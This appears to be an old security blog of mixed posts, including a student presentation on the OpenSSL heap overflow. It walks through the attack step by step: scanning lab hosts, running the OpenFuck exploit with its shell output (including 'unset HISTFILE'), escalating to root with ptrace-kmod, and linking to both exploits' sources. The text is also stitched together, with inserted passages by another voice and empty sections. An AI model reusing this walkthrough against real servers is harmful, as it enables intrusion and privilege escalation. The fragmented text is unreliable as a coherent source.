Tools
- Tool to allow the use of a browser in solving cryptograms.
- word-game programmers mailing list tools page
- One Across Search Engine
Cryptograms:
This sort of thing is needed. "To name something is to know it" is a bit old-hat, but has some truth to it. We do it for malicious code (though agreement has yet to be reached in some cases), biological viruses, and war. Why not directed virtual attacks?
Compulsive.org has a pointer to CDC's blog.
For anyone who doesn't know who the Cult of the Dead Cow is, they are the hacker group that brought the world Back Orifice, Camera/Shy, and Peekabooty.
The blog even has an RSS feed for those of us with aggregators.
Jim O'Halloran's Weblog: SquidGaurd and Dan's Guardian - Web Filtering Software is a post on Jim O'Halloran's blog about a couple of filtering programs for the Squid web cache.
I wish him luck if he's going to do this sort of thing. Both are a slippery slope into constantly reconfiguring the filters to keep up with the new porn sites added every day.
I've tried keyword filters but that gets out of hand very quickly. Above a certain number of lines (256-character limit), the cache noticeably slows.
We then tried various filtering plug-ins, like Squidguard, but they too slowed service once a certain number of sites were entered.
About the only way we were able to get above 5000 sites was to reconfigure Squid to use a private DNS server (only for the cache, but not on the cache) and set up a poison DNS zone for each porn site domain. We were up to well over 21,000 porn sites before we quit adding them (it was turning into a full time job).
The programs DO work, just not well under heavy loads. And there's always a new porn site that's not on the list. I'll post a howto here in the next few days for anyone that actually cares to read it.
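One shape this setup can take, as an added illustration (mine, not the author's configuration and not the promised howto; the addresses, domain names and file names are made up): Squid is pointed at a private resolver, and that resolver is made authoritative for each blocked domain with a tiny zone that answers every name under it with a local address.

```conf
# --- squid.conf on the cache box: resolve only through the private
#     resolver (10.0.0.53 is an assumed internal address) ---
dns_nameservers 10.0.0.53

# --- named.conf on the private resolver: one stanza per blocked domain,
#     all sharing the same zone file ---
zone "blocked-site.example" { type master; file "/var/named/blackhole.zone"; };
zone "another-blocked.example" { type master; file "/var/named/blackhole.zone"; };

# --- /var/named/blackhole.zone: the domain itself and every name under it
#     resolve to 127.0.0.1 (or the address of a local "blocked" page host) ---
$TTL 86400
@   IN  SOA ns.cache.example. hostmaster.cache.example. ( 2003050101 3600 900 604800 86400 )
    IN  NS  ns.cache.example.
    IN  A   127.0.0.1
*   IN  A   127.0.0.1
```

Adding a site is then one zone stanza and a reload of named rather than a Squid restart, which is what lets the list grow past what the ACL-based filters handle. The trade-offs: whole domains are blocked, not individual URLs, and the private resolver needs forwarders configured for everything it is not authoritative for, or the cache resolves nothing at all.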
Legislating the use of content filtering, while meaning well, is only going to expose various institutions to litigation. Anyone capable of using Google's extra features can get around filters very easily. Some soccer mom is going to sue a city library because her kid saw someone else's kid viewing porn in the back row of workstations at the library. I wish legislators would realize that a public library is an adult building, similar to a church or courthouse. In those areas, children are supposed to be supervised. A public library is no different.
For anyone attempting to use my e-mail file server: it's broken. The latest upgrade broke the local input (due to a major change in how the mail server does things). I think it's time to jump to Postfix.
I'll let you know how things go.
I've switched to the 3-column format. I had to add tables (for now) as the CSS layout was not setting the right-hand margin correctly when I changed font sizes. The text in the middle column was disappearing under the right-hand column.
Anyways.... Please let me know if there are any further display problems (it looks fine in Galeon, for me).
Please bear with me, I retyped this on the fly from memory (the original hardcopy is about 35 miles away) and Google.
Please consider this presentation notes rather than a paper and that this is my first time doing this sort of thing.
I chose the following for my end-of-semester presentation:
Vulnerabilities:
Exploits:
My project started as an experiment with openssl-uzi, which was discussed in class a few weeks ago. It was only available (at the time) on NetSys.com. (ftp://ftp.netsys.com/len/openssl-uzi.tar.gz)
Uzi is not a stack overflow exploit. It's a heap overflow exploit. Stack overflows overrun fixed-length buffers on the stack. Heap overflows overrun dynamically allocated regions of memory (allocated at run time by an application or a kernel module). (See the bottom of this page for the location of a tutorial.)
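To make the distinction concrete, here is an added example (mine, not from the original notes and not OpenSSL's code): a fixed-size field inside a malloc()ed structure, a parser that copies a peer-declared length into that field without comparing the length to the field's size, and the one-line check that fixes it. The message format and the structure layout are invented for the demo; the OpenSSL bug these tools exploit is an overflow of this general shape in the handshake handling.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy session record (NOT OpenSSL's SSL_SESSION): a fixed-size field
 * followed by another field, both inside one malloc()ed object. */
struct session {
    unsigned char key_arg[8];    /* fixed-size slot the peer fills       */
    unsigned char next_field[8]; /* whatever the record keeps after it   */
};

/* Constructed wire format (assumed, for the demo): one length byte,
 * then that many bytes of payload. */

struct session *new_session(void) {
    struct session *s = calloc(1, sizeof *s);
    if (!s) abort();
    memcpy(s->next_field, "NEXTFLD", sizeof s->next_field); /* 7 chars + NUL */
    return s;
}

/* Vulnerable parser: copies the peer-declared length into an 8-byte
 * field. Only the message bound is checked, never the destination size,
 * so payload bytes 8.. land in next_field (a longer message would run
 * past the end of the object into the heap proper). */
int parse_key_arg_vuln(struct session *s, const unsigned char *msg, size_t msg_len) {
    if (msg_len < 1) return -1;
    size_t len = msg[0];
    if (msg_len < 1 + len) return -1;
    unsigned char *dst = s->key_arg;
    for (size_t i = 0; i < len; i++)
        dst[i] = msg[1 + i];                 /* i >= 8 overruns key_arg */
    return 0;
}

/* Fixed parser: the declared length is bounded by the destination size. */
int parse_key_arg_fixed(struct session *s, const unsigned char *msg, size_t msg_len) {
    if (msg_len < 1) return -1;
    size_t len = msg[0];
    if (msg_len < 1 + len) return -1;
    if (len > sizeof s->key_arg) return -1;  /* the missing check */
    memcpy(s->key_arg, msg + 1, len);
    return 0;
}

/* Constructed attacker input: length byte 16, then sixteen 'A's. */
static size_t build_oversized_msg(unsigned char *buf, size_t buf_sz) {
    size_t payload = 16;
    if (buf_sz < 1 + payload) return 0;
    buf[0] = (unsigned char)payload;
    memset(buf + 1, 'A', payload);
    return 1 + payload;
}

/* 1 if the vulnerable parser accepted the message and next_field now holds the overflow. */
int demo_vuln_clobbers_next_field(void) {
    unsigned char msg[32];
    size_t n = build_oversized_msg(msg, sizeof msg);
    struct session *s = new_session();
    int accepted  = parse_key_arg_vuln(s, msg, n) == 0;
    int clobbered = memcmp(s->next_field, "AAAAAAAA", sizeof s->next_field) == 0;
    free(s);
    return accepted && clobbered;
}

/* 1 if the fixed parser rejected the message and next_field is untouched. */
int demo_fixed_rejects(void) {
    unsigned char msg[32];
    size_t n = build_oversized_msg(msg, sizeof msg);
    struct session *s = new_session();
    int rejected = parse_key_arg_fixed(s, msg, n) == -1;
    int intact   = memcmp(s->next_field, "NEXTFLD", sizeof s->next_field) == 0;
    free(s);
    return rejected && intact;
}

int main(void) {
    printf("vulnerable parser clobbered next_field: %s\n",
           demo_vuln_clobbers_next_field() ? "yes" : "no");
    printf("fixed parser rejected the message:      %s\n",
           demo_fixed_rejects() ? "yes" : "no");
    return 0;
}
```

Because the overrun lands inside the same allocation, nothing crashes: a field the program trusts just quietly changes value. Push the length further and the write crosses the end of the object into the allocator's bookkeeping or the next chunk, which is what the heap exploit tutorials linked at the bottom of this page build on.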
I downloaded the tool at home and played with it. It comes with a vulnerability scanner which I used here in class. The scanner reported that classroom IPs 172.28.238.250 and 251 are vulnerable.
To determine what versions of which software were being run on the boxes, I used wget with the -S switch (which prints the server's HTTP response headers along with the download).
Example:
[root@localhost openssl-uzi]# wget -S 172.28.238.250
--19:12:31-- http://172.28.238.250/
=> 'index.html.5'
Connecting to 172.28.238.250:80...connected.
HTTP request sent, awaiting response...
1 HTTP/1.1 200 OK
2 Date: Mon, 14 Apr 2003 22:58:23 GMT
3 Server: Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_ssl/2.8.1 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01
.
.
.
A slew of good info. Try it yourself.
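Turning a banner like that into a yes/no answer takes a little parsing, so here is an added example in C (mine, not part of the original notes or of either tool): it pulls the OpenSSL token out of a Server: line and compares it against the first release that carried the fix, taken here as 0.9.6e (an assumption to confirm against the OpenSSL advisory for the branch you care about).

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* First OpenSSL release assumed to carry the fix; verify against the advisory. */
#define FIRST_FIXED_VERSION "0.9.6e"

/* Copy the token following "OpenSSL/" from a Server: header line into ver.
 * Returns 1 on success, 0 if the banner does not advertise OpenSSL. */
int extract_openssl_version(const char *server_line, char *ver, size_t ver_sz) {
    const char *p = strstr(server_line, "OpenSSL/");
    if (!p || ver_sz == 0) return 0;
    p += strlen("OpenSSL/");
    size_t n = 0;
    while (*p && !isspace((unsigned char)*p) && n + 1 < ver_sz)
        ver[n++] = *p++;
    ver[n] = '\0';
    return n > 0;
}

/* Compare two OpenSSL-style versions ("0.9.6", "0.9.6d"): numeric parts
 * first, then the optional patch letter (no letter sorts before 'a').
 * Anything that is not a letter after the numbers ("-beta3") is ignored.
 * Returns <0, 0 or >0 like strcmp. */
int openssl_version_cmp(const char *a, const char *b) {
    int an[3] = {0, 0, 0}, bn[3] = {0, 0, 0};
    char al = 0, bl = 0;
    sscanf(a, "%d.%d.%d%c", &an[0], &an[1], &an[2], &al);
    sscanf(b, "%d.%d.%d%c", &bn[0], &bn[1], &bn[2], &bl);
    for (int i = 0; i < 3; i++)
        if (an[i] != bn[i]) return an[i] < bn[i] ? -1 : 1;
    if (!isalpha((unsigned char)al)) al = 0;
    if (!isalpha((unsigned char)bl)) bl = 0;
    return (int)al - (int)bl;
}

/*  1: banner advertises a version older than the fix
 *  0: banner advertises the fixed version or newer
 * -1: no OpenSSL token in the banner (unknown; do not read as safe) */
int banner_looks_vulnerable(const char *server_line) {
    char ver[32];
    if (!extract_openssl_version(server_line, ver, sizeof ver)) return -1;
    return openssl_version_cmp(ver, FIRST_FIXED_VERSION) < 0 ? 1 : 0;
}

int main(void) {
    /* First line is the header from the wget -S run above; the other two are constructed. */
    const char *banners[] = {
        "Server: Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_ssl/2.8.1 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01",
        "Server: Apache/1.3.27 (Unix) mod_ssl/2.8.12 OpenSSL/0.9.6g",
        "Server: Apache",
    };
    for (size_t i = 0; i < sizeof banners / sizeof banners[0]; i++)
        printf("%2d  %s\n", banner_looks_vulnerable(banners[i]), banners[i]);
    return 0;
}
```

A banner is only a hint. Distributions backport fixes without bumping the version string (so a "0.9.6" with no letter may or may not be patched), and Apache can be told to hide the modules entirely with ServerTokens. The scanner shipped in the tarball actually exercises the handshake and is the better test; the banner just tells you where to point it first.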
In doing research for the buffer overflow and the exploit, I discovered an even better (easier) exploit called OpenFuck. Better in that the programmer has figured out the required offsets for you. See the source code for the listing (quite a few more included in OpenFuck than in Uzi). Rob even found OpenFuck V2.
OpenFuck is available at: http://packetstorm.linuxsecurity.com/0303-exploits/OpenFuck.c
According to the source code (most of the way down, look for the banner), OpenFuck is based on openssl-uzi's openssl-too-open exploit code.
OpenFuck was really nice. If you read the source code (or run it with no options), you get a list of Linux distributions and their associated buffer offsets. Note: it's not restricted to Linux; FreeBSD is also listed.
So, for 172.28.238.250, the indicated offset is 0x5f. The syntax for the command is:
./openfuck 0x5f 172.28.238.250
Example output from the above command:
[root@localhost x]# ./openfuck 0x5f 172.28.238.250
**********************************************************************
* OpenFuck v 2.5.0.2 ripped from openssl-too-open *
**********************************************************************
* If U know more offset please contact us *
* *
**********************************************************************
* offset by SPABAM added LSD shellcode *
* #highsecure *
* TNX special 2 #uname and #hackarena #SilverLords #isotk #BloodBR *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
**********************************************************************
Establishing SSL connection
cipher: 0x4078ba2c ciphers: 0x81f4568
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.04$
bash-2.04$ unset HISTFILE; uname -a; id; echo SPABAM R0X; pwd; w;
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
SPABAM R0X
/
7:18pm up 4 min, 0 users, load average: 0.00, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.04$
bash-2.04$
(Side note: this may not work if the version of OpenSSL that you're using is older than the version you're trying to attack. A good point to research? We had problems running the exploit from various machines in the open lab.)
Note: Using this a lot against the same box tends to cause a DoS as the binary locks up and refuses to answer connection attempts.
Because Apache on 172.28.238.250 runs its worker processes as the user apache, we get a shell as that user, not as root.
Once you're in, check who you are via "whoami". Most often this will report "apache" or "nobody", depending on how the Apache server is configured.
To get root, we'll need to employ a local exploit. It took a bit of searching around, but for this system I found ptrace-kmod.c, which exploits a race condition in this version of the kernel. The kernel code in question (kmod.c) spawns its helper threads in an insecure manner. The exploit abuses how ptrace tracks cloned processes, which lets it attach to and take control of the privileged modprobe binary. Supposedly it works against all unpatched 2.2.x and 2.4.x kernels.
Once the helper is hijacked, shellcode is injected into it and a root shell is opened. Voila! You don't get a shell prompt, but it still works. (Show "whoami" and "ls".)
Source at: http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c
Fixes:
Precautions:
A good explanation of the OpenSSL heap vulnerability (with colored pictures) is available at: http://project.honeynet.org/scans/scan25/sol/NCSU/exploit-diagram.htm
The heap overflow tutorial is available at: http://community.corest.com/~juliano/heap/heaptut.txt
In an article entitled " Intruder Alerts: Detection or Protection", a "panel of analysts" said that "Intrusion detection systems are dead". Can this be the same panel of experts that said Linux/Windows/Disco balls/roller skating is dead?
I think the quote from Vic Wheatman of the Gartner Group gives a good hint: "People bought it, installed it and turned it down when they had too many alerts."
What can you get from reading between the lines? People bought what they'd thought was a black box cure-all, plugged it in, turned it on and refused to face the fact that IDS requires reconfiguring every time your network config changes.
Intrusion detection systems have their place and function in any network. You just have to remember that they have their own shortcomings (and configure around those):
IDS are intended to be part of Defense in depth. Hackneyed as that buzz-phrase has become, there's still truth in it. Use multiple layers of protections (filtering routers, firewalls, DMZ's, etc.). Use differing operating systems and vendors in multiple layers (only the more talented hackers will be able to get through multiple layers)(and the majority of your problems are the script kiddies after low-hanging fruit).
In addition to all that, remember: "It's not if but when."
Oh! And there's still a market for disco balls (Ask Saddam. It's said that his love nest was straight out of the 70's.) and roller skates (visit Europe or the People's Republic of California!).
Supposedly you can tail your logs at the bottom of a terminal.
The new layout is based on some CSS resources that Simon Willison had pointed to.
Craig from Compulsive.org basically nailed this on (the question about your Vice Mayor didn't really count).
Historically, security managers have always had problems with those people who feel that rank gives them the privilege to be the exception to the rule. These exceptions should not exist. The "privileged life" is a self-made/self-perpetuating fantasy (actually it's a petty display of power, as in "I'm senior enough that the rules don't apply to me"), and the source of more than 50% of a security manager's problems (insider abuse).
If an organization is set up correctly, the security manager answers only to the #1 person (the person whose signature is at the bottom of the policy statements) in the organization. Once you start allowing exceptions to any policy, it corrupts the overall impression of that policy, and often leads to large scale contempt of that policy.
Mr. Ibarra stated that City Hall was a public building. That's incorrect. City Hall is the building where elected officials and public employees work and expect a secure environment to perform that work in. It may be a common belief that a building is public property but that does not give anyone the automatic "right" of access. The same rules that apply to the person pushing the mop (who actually needs more access to do their job) should apply to the person wielding the pen or gavel (who usually needs access to only 2-4 rooms in the building).
Cringely's article (at least this one) is entertaining (if you can consider massive waste a form of entertainment). I've seen similar things and can attest that you can make a marginal living collecting/buying, repairing and reselling those throwaway technologies. (You've seen the used bicycle repair shop downtown right?) Google should consider allowing volunteer techs from a local charity to cart them out and Frankenstein them. Heck, it'd probably make a decent tax write-off.
Nowadays, my wife looks at me cross-eyed when I object to her suggestion of getting rid of her old computer when we upgrade. During my teenage years, we kept our POS cars running by scavenging off of same-model junkers in the local junk yard. I just know that computer will make a good mail/file server.
Another fun part of their site is the daily trivia page.
I've got about three years worth of news articles (mostly text) in MySQL tables which I've formatted into a single table (mostly HTML) and have inserted into the submissions queue in PHP-Nuke. I still have the original tables if it helps.
I've found html2ps, but it appears to be overkill. Anyone know of something better?
The short version is that the former Vice Mayor of Tucson was stopped from entering the city building (twice, same day, different doors) because he had no ID. The guards were just doing their job: "no ID, no entrance". Councilman Ibarra was then critical of them while talking to the local newspaper.
If the Mayor of Tucson has a head on his shoulders, he'll take the Honorable Mr. Ibarra to task (privately this time) for his actions and publicly commend the City Clerk (in charge), the four security officers and the city maintenance worker.
Pop Quiz:
Answers tomorrow!
Not that I like a lot of the articles out of ZDNetAU (I don't), but this one discusses a subject that admin and security mailing lists have touched on a lot recently. The short version is that the article is a brief explanation of honeypots and botnets.
Thanks to LinuxSecurity.com for pointing it out.
No in-depth explanations or theory, but a good starting point if you're just beginning in admin or security work.
File this one under "How to Profit from a Declining Economy". Seems that Microsoft has discovered a way to profit from the downsizing or divesting of other companies. InfoWorld has an article here. Wanna bet this also applies to the purchase programs where employees are allowed to buy the systems the company has decided to replace? How long before the BSA starts visiting your local yard sale to see if anyone is selling their old systems in the driveway?
Read your licensing agreements people!!
Thanks to SecuriTeam for pointing it out.
I disagree with Mr. Flintz's position that it would be near impossible to check all of its customers' web sites. They can either: 1) use a Tripwire-like program to alert on changes, 2) read their server log files, 3) parse existing websites for relationship trees (more than one tree means a hidden site!), or 4) make usage logs available to each customer and prompt them to monitor their own traffic.
On the plus side: included in the tar ball is a scanner to determine if (a|your) web server is vulnerable. You should, at least, compile that one and test your servers.
Initial impressions:
Note: Since I wrote this last weekend, I've found a derivative of OpenSSL-Uzi called OpenFuck and a second version of it. Each is based on Uzi's code but includes the offsets for a lot more distributions (and not only Linux!)
Anyone have anything to add?
A decent read.
Well, they've done it. A marketing type has said, "We do view Google more and more as a competitor. We believe that we can provide consumers with a better product and a better user experience."
Note: The rest of this piece is speculative conjecture.
Given that:
At the risk of driving my coworkers into seizures by my restating this, MS Office is a very nice product. Ignoring the security problems, there is very little to compare with it. But remember, they were in at the start of that race. Everything else since then (including networking) has failed to supplant competitors.
Since Microsoft's marketing practices, of late, appear to view everything as an "income stream" (including Joe Sixpack users)(Can you say "license subscriptions"?), stand by for a LOT of hype following the release of, at best, a fair product.
To compete with Google and its half-dozen or so cousins, MS is going to have to come up with a better product (without infringing on Google's code). About the only way I think they can improve on Google is to use all of those idle processing cycles on the user's desktop. All it would take would be a slight modification of the EULA and MS would have the "right" to use them. That or some really nasty marketing/legal/political actions.
I wonder what they're up to. And how much of a security nightmare it's going to be.
I think I'll try installing it on the SRX-77 again since it now supports ACPI (needed for the wireless).
In Evil I, we witness blog comment spam from a marketing company in Malaysia. (That one was easy, as the CMS software logged the offending IPs, and it's not like we read each other's blogs now, is it?)
In this sequel, we witness this. Seems that some spammers are no longer content with forging headers and hijacking mail servers, some are now rerouting traffic across the Internet to disguise themselves. Think of it as something like turning on the tube to watch Fox News and getting Faux News.
Comment page hijacking. Seems that if you leave "Allow HTML" turned on, comment authors can add which will drag the browsing user to the new URL.
Source: MT User Forums.
Blackbox eZine has an article about shell coding for buffer overflow exploits.
Doing the math, the estimated "loss" was a cool 1/4 mil., generated by 13 cable connections. That comes to approximately $20K per household. Given the maximum speed of an uncapped modem, I doubt the local cable company let things go so long that each generated an upstream bill for the cable company amounting to $20K.
Somehow I think the cable company futzed the numbers so that they were high enough to get the FBI involved (you've got to convince the judge). Wanna bet the majority of the Toledo 13 are teenagers? Is this a case of the "victim" wasting the FBI's time and resources?
Would someone who agrees with the cable company's loss please explain it to me? (But keep in mind that I have a ready rant about bandwidth not being a conservable resource.) Yes, I can see the cable companies side of the argument. I just can't figure out the numbers or why the FBI got involved. This probably should have been just an issue for local law enforcement.
There's got to be more to the story.